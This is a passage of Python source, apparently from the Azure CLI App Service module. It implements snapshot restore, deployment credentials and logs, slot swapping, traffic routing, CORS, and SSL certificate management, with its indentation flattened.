if all([source_resource_group, source_name]):
# Restore from source app to target app
sub_id = get_subscription_id(cmd.cli_ctx)
source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
"/providers/Microsoft.Web/sites/" + source_name
if source_slot:
source_id = source_id + "/slots/" + source_slot
source = SnapshotRecoverySource(id=source_id)
request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
if any([source_resource_group, source_name]):
raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
# Overwrite app with its own snapshot
request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(cmd, db_name, db_type, db_connection_string):
DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting')
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
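# _parse_frequency turns a string such as '7d' or '12h' into (7, FrequencyUnit.day) or (12, FrequencyUnit.hour):
# the trailing character selects the unit and the leading digits the interval.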
def _parse_frequency(cmd, frequency):
FrequencyUnit = cmd.get_models('FrequencyUnit')
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
def _get_location_from_resource_group(cli_ctx, resource_group_name):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
group = client.resource_groups.get(resource_group_name)
return group.location
def _get_location_from_webapp(client, resource_group_name, webapp):
webapp = client.web_apps.get(resource_group_name, webapp)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp))
return webapp.location
def _get_deleted_apps_locations(cli_ctx):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
web_provider = client.providers.get('Microsoft.Web')
del_sites_resource = next((x for x in web_provider.resource_types if x.resource_type == 'deletedSites'), None)
if del_sites_resource:
return del_sites_resource.locations
return []
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
webapp = show_webapp(cmd, resource_group_name, name, slot=slot)
for host in webapp.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ValueError('Failed to retrieve Scm Uri')
def get_publishing_user(cmd):
client = web_client_factory(cmd.cli_ctx)
return client.get_publishing_user()
def set_deployment_user(cmd, user_name, password=None):
'''
Update deployment credentials. (Note: all webapps in your subscription will be impacted.)
'''
User = cmd.get_models('User')
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'begin_list_publishing_credentials', slot)
return content.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None, xml=False):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot, {"format": "WebDeploy"})
full_xml = ''
for f in content:
full_xml += f.decode()
if not xml:
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
if not isinstance(profiles, list):
profiles = [profiles]
for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
cmd.cli_ctx.invocation.data['output'] = 'tsv'
return full_xml
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
if credentials:
cd_url = credentials.scm_uri + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
SslState = cmd.get_models('SslState')
site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
url = site.enabled_host_names[0]  # picks the custom domain URL in case a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob support
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
AzureBlobStorageApplicationLogsConfig, SiteLogsConfig,
HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
location = site.location
application_logs = None
if application_logging:
fs_log = None
blob_log = None
level = level if application_logging != 'off' else False
level = True if level is None else level
if application_logging in ['filesystem', 'off']:
fs_log = FileSystemApplicationLogsConfig(level=level)
if application_logging in ['azureblobstorage', 'off']:
blob_log = AzureBlobStorageApplicationLogsConfig(level=level, retention_in_days=3,
sas_url=None)
application_logs = ApplicationLogsConfig(file_system=fs_log,
azure_blob_storage=blob_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
# TODO: az blob storage log config currently not in use, will be implemented later.
# Tracked as Issue: #4764 on Github
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
# 100 MB max log size, 3-day retention; hard-coded to match the portal defaults
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(location=location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
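# show_deployment_log queries the Kudu /api/deployments endpoint: with a deployment id it fetches that
# deployment's log directly, otherwise it picks the most recent deployment (by start_time) and follows its log_url.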
def show_deployment_log(cmd, resource_group, name, slot=None, deployment_id=None):
import urllib3
import requests
scm_url = _get_scm_url(cmd, resource_group, name, slot)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
deployment_log_url = ''
if deployment_id:
deployment_log_url = '{}/api/deployments/{}/log'.format(scm_url, deployment_id)
else:
deployments_url = '{}/api/deployments/'.format(scm_url)
response = requests.get(deployments_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployments_url, response.status_code, response.reason))
sorted_logs = sorted(
response.json(),
key=lambda x: x['start_time'],
reverse=True
)
if sorted_logs and sorted_logs[0]:
deployment_log_url = sorted_logs[0].get('log_url', '')
if deployment_log_url:
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployment_log_url, response.status_code, response.reason))
return response.json()
return []
def list_deployment_logs(cmd, resource_group, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group, name, slot)
deployment_log_url = '{}/api/deployments/'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
import urllib3
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
import requests
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
scm_url, response.status_code, response.reason))
return response.json() or []
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return client.web_apps.update_configuration_slot(resource_group_name, webapp, site_config, slot)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
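# swap_slot supports three actions: 'swap' performs the actual slot swap, 'preview' applies the target
# slot's settings to the source slot without swapping, and any other value (the CLI's 'reset' action)
# undoes a previous preview by resetting the slot configuration.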
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, preserve_vnet=None, action='swap'):
client = web_client_factory(cmd.cli_ctx)
# Default isPreserveVnet to 'True' if preserve_vnet is 'None'
isPreserveVnet = preserve_vnet if preserve_vnet is not None else 'true'
# conversion from string to Boolean
isPreserveVnet = bool(isPreserveVnet == 'true')
CsmSlotEntity = cmd.get_models('CsmSlotEntity')
slot_swap_entity = CsmSlotEntity(target_slot=target_slot or 'production', preserve_vnet=isPreserveVnet)
if action == 'swap':
poller = client.web_apps.begin_swap_slot(resource_group_name, webapp, slot, slot_swap_entity)
return poller
if action == 'preview':
if slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name, webapp, slot_swap_entity)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp, slot, slot_swap_entity)
return result
# we will reset both source slot and target slot
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
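# set_traffic_routing expects distribution entries of the form '<slot>=<percentage>' (e.g. 'staging=25')
# and rewrites the ramp-up rules so that percentage of traffic is rerouted to '<app>-<slot>.<default suffix>'.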
def set_traffic_routing(cmd, resource_group_name, name, distribution):
RampUpRule = cmd.get_models('RampUpRule')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_split = site.default_host_name.split('.', 1)
host_name_suffix = '.' + host_name_split[1]
host_name_val = host_name_split[0]
configs.experiments.ramp_up_rules = []
for r in distribution:
slot, percentage = r.split('=')
action_host_name_slot = host_name_val + "-" + slot
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=action_host_name_slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
if provider:
streaming_url += ('/' + provider.lstrip('/'))
user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'begin_list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
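# _get_log issues a basic-auth GET against the SCM (Kudu) URL: with log_file the response is written to
# disk in 1 KB chunks, otherwise each streamed chunk is re-encoded to the console encoding and printed.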
def _get_log(url, user_name, password, log_file=None):
import certifi
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
# extra encode()/decode() for stdout encodings that do not support 'utf-8'
logger.warning(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace')
.rstrip('\n\r')) # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
cert_file = open(certificate_file, 'rb')
cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
''' Decrypts the .pfx file and returns the certificate's SHA-1 thumbprint '''
p12 = OpenSSL.crypto.load_pkcs12(open(certificate_file, 'rb').read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def show_ssl_cert(cmd, resource_group_name, certificate_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.get(resource_group_name, certificate_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
server_farm_id = webapp.server_farm_id
location = webapp.location
kv_id = None
if not is_valid_resource_id(key_vault):
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
key_vaults = kv_client.vaults.list_by_subscription()
for kv in key_vaults:
if key_vault == kv.name:
kv_id = kv.id
break
else:
kv_id = key_vault
if kv_id is None:
kv_msg = 'The Key Vault {0} was not found in the subscription in context. ' \
'If your Key Vault is in a different subscription, please specify the full Resource ID: ' \
'\naz .. ssl import -n {1} -g {2} --key-vault-certificate-name {3} ' \
'--key-vault /subscriptions/[sub id]/resourceGroups/[rg]/providers/Microsoft.KeyVault/' \
'vaults/{0}'.format(key_vault, name, resource_group_name, key_vault_certificate_name)
logger.warning(kv_msg)
return
kv_id_parts = parse_resource_id(kv_id)
kv_name = kv_id_parts['name']
kv_resource_group_name = kv_id_parts['resource_group']
kv_subscription = kv_id_parts['subscription']
# If in the public cloud, check whether the certificate is an App Service Certificate, in the same or a different
# subscription
kv_secret_name = None
cloud_type = cmd.cli_ctx.cloud.name
from azure.cli.core.commands.client_factory import get_subscription_id
subscription_id = get_subscription_id(cmd.cli_ctx)
if cloud_type.lower() == PUBLIC_CLOUD.lower():
if kv_subscription.lower() != subscription_id.lower():
diff_subscription_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_APPSERVICE,
subscription_id=kv_subscription)
ascs = diff_subscription_client.app_service_certificate_orders.list()
else:
ascs = client.app_service_certificate_orders.list()
kv_secret_name = None
for asc in ascs:
if asc.name == key_vault_certificate_name:
kv_secret_name = asc.certificates[key_vault_certificate_name].key_vault_secret_name
# if kv_secret_name is not populated, it is not an App Service Certificate; fall back to the Key Vault certificate name
if not kv_secret_name:
kv_secret_name = key_vault_certificate_name
cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
lnk_msg = 'Find more details here: {}'.format(lnk)
if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name, kv_subscription):
logger.warning('Unable to verify Key Vault permissions.')
logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
logger.warning(lnk_msg)
kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='',
key_vault_secret_name=kv_secret_name, server_farm_id=server_farm_id)
return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name,
certificate_envelope=kv_cert_def)
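# create_managed_ssl_cert validates the plan tier and the hostname binding, then creates a managed
# certificate; because the backend may answer 202, the 'Location' header is polled manually for up to
# two minutes (see the TODO about switching to LongRunningOperation).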
def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None):
Certificate = cmd.get_models('Certificate')
hostname = hostname.lower()
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
slot_text = "Deployment slot {} in ".format(slot) if slot else ''
raise CLIError("{0}app {1} doesn't exist in resource group {2}".format(slot_text, name, resource_group_name))
parsed_plan_id = parse_resource_id(webapp.server_farm_id)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
if plan_info.sku.tier.upper() == 'FREE' or plan_info.sku.tier.upper() == 'SHARED':
raise CLIError('Managed Certificate is not supported on Free and Shared tier.')
if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot):
slot_text = " --slot {}".format(slot) if slot else ""
raise CLIError("Hostname (custom domain) '{0}' is not registered with {1}. "
"Use 'az webapp config hostname add --resource-group {2} "
"--webapp-name {1}{3} --hostname {0}' "
"to register the hostname.".format(hostname, name, resource_group_name, slot_text))
server_farm_id = webapp.server_farm_id
location = webapp.location
easy_cert_def = Certificate(location=location, canonical_name=hostname,
server_farm_id=server_farm_id, password='')
# TODO: Update manual polling to use LongRunningOperation once backend API & new SDK supports polling
try:
return client.certificates.create_or_update(name=hostname, resource_group_name=resource_group_name,
certificate_envelope=easy_cert_def)
except Exception as ex:
poll_url = ex.response.headers['Location'] if 'Location' in ex.response.headers else None
if ex.response.status_code == 202 and poll_url:
r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
poll_timeout = time.time() + 60 * 2 # 2 minute timeout
while r.status_code != 200 and time.time() < poll_timeout:
time.sleep(5)
r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
if r.status_code == 200:
try:
return r.json()
except ValueError:
return r.text
logger.warning("Managed Certificate creation in progress. Please use the command "
"'az webapp config ssl show -g %s --certificate-name %s' "
" to view your certificate once it is created", resource_group_name, hostname)
return
raise CLIError(ex)
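# The service-principal check below only works within the current subscription: it looks through the
# vault's access policies for the Microsoft.Azure.WebSites first-party app (public or government cloud
# app id) holding the 'Get' permission on secrets.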
def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name, key_vault_subscription):
from azure.cli.command_modules.role._client_factory import _graph_client_factory
from azure.graphrbac.models import GraphErrorException
from azure.cli.core.commands.client_factory import get_subscription_id
subscription = get_subscription_id(cmd.cli_ctx)
# Cannot check if key vault is in another subscription
if subscription != key_vault_subscription:
return False
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
vault = kv_client.vaults.get(resource_group_name=resource_group_name, vault_name=key_vault_name)
# Check for Microsoft.Azure.WebSites app registration
AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd'
AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714'
graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
for policy in vault.properties.access_policies:
try:
sp = graph_sp_client.get(policy.object_id)
if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID:
for perm in policy.permissions.secrets:
if perm == "Get":
return True
except GraphErrorException:
pass # Lookup will fail for non service principals (users, groups, etc.)
return False
def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp,
host_name, ssl_state, thumbprint, slot=None):
Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState')
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=webapp.location, tags=webapp.tags)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'begin_create_or_update',
slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise ResourceNotFoundError("'{}' app doesn't exist".format(name))
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
found_cert = None
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
found_cert = webapp_cert
if not found_cert:
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
found_cert = webapp_cert
if found_cert:
if len(found_cert.host_names) == 1 and not found_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
found_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
query_result = list_hostnames(cmd, resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(found_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
h, ssl_type, certificate_thumbprint, slot)
return show_webapp(cmd, resource_group_name, name, slot)
raise ResourceNotFoundError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
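# A wildcard certificate name such as '*.contoso.com' matches any webapp host name whose suffix after the
# first '.' is '.contoso.com' (e.g. 'admin.contoso.com'); non-wildcard names must match exactly.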
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host names like 'admin.foo.com', 'logs.foo.com', etc.
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# helper class that handles runtime stacks in formats like 'node|6.1', 'php|5.5'
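# e.g. remove_delimiters('node:6.1') and remove_delimiters('node|6.1') both normalize to 'node|6.1', and
# resolve('Node|6.1') does a case-insensitive lookup against the hard-coded stack list, returning None on a miss.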
class _StackRuntimeHelper:
def __init__(self, cmd, client, linux=False):
self._cmd = cmd
self._client = client
self._linux = linux
self._stacks = []
@staticmethod
def remove_delimiters(runtime):
import re
# delimiters allowed: '|', ':'
if '|' in runtime:
runtime = re.split('[|]', runtime)
elif ':' in runtime:
runtime = re.split('[:]', runtime)
else:
runtime = [runtime]
return '|'.join(filter(None, runtime))
def resolve(self, display_name):
self._load_stacks_hardcoded()
return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
None)
@property
def stacks(self):
self._load_stacks_hardcoded()
return self._stacks
@staticmethod
def update_site_config(stack, site_config, cmd=None):
for k, v in stack['configs'].items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(cmd, stack, site_config):
NameValuePair = cmd.get_models('NameValuePair')
if site_config.app_settings is None:
site_config.app_settings = []
for k, v in stack['configs'].items():
already_in_appsettings = False
for app_setting in site_config.app_settings:
if app_setting.name == k:
already_in_appsettings = True
app_setting.value = v
if not already_in_appsettings:
site_config.app_settings.append(NameValuePair(name=k, value=v))
return site_config
def _load_stacks_hardcoded(self):
if self._stacks:
return
result = []
if self._linux:
result = get_file_json(RUNTIME_STACKS)['linux']
for r in result:
r['setter'] = _StackRuntimeHelper.update_site_config
else: # Windows stacks
result = get_file_json(RUNTIME_STACKS)['windows']
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# the stacks API is only updated with Antares deployments, which are infrequent
# and don't line up with the stacks' EOL schedule.
def _load_stacks(self):
if self._stacks:
return
os_type = ('Linux' if self._linux else 'Windows')
raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
bytes_value = raw_stacks._get_next().content # pylint: disable=protected-access
json_value = bytes_value.decode('utf8')
json_stacks = json.loads(json_value)
stacks = json_stacks['value']
result = []
if self._linux:
for properties in [(s['properties']) for s in stacks]:
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
})
else: # Windows stacks
config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version'
}
# get all stack versions except 'java'
for stack in stacks:
if stack['name'] not in config_mappings:
continue
name, properties = stack['name'], stack['properties']
for major in properties['majorVersions']:
